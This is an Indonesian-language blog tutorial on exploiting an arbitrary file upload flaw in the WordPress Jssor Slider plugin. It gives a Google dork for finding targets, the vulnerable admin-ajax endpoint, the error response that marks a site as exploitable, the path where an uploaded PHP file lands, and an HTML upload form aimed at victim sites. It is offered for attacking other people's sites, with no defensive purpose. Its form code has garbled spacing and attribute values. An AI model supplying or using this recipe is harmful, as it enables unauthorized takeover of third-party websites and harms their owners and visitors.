Wordpress Jssor-Slider CSRF Arbitary File Upload



Jssor Slider adalah tayangan slide / slider / galeri / korsel / spanduk, itu dioptimalkan untuk perangkat seluler dengan banyak fitur unik.


  • Google Dork : inurl:''/wp-content/jssor-slider/jssor-uploads/''
  • Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
  • Vulnerbility Error : Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
  • File Path : /wp-content /jssor-slider/jssor-uploads/yourfile.php

Tutorial :

Pertama, copy dork di atas dan paste di browser kalian, lalu cari web yang menurut kalian vuln Jika di masukkan exploit muncul vulnerbility error seperti di atas Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}




Lalu buka CSRF nya atau  Disini
<html>
<body>
<form action = "http: // [PATH] /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method = "POST" enctype = "multipart / form-data">
<input type = "file" name = "file" />
<input type = "kirim" value = "Kirim" />
</form>
</body>
</ html
Blank atau muncul Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} Vuln










Eat, Sleep, Coding. Repeat !

Post a Comment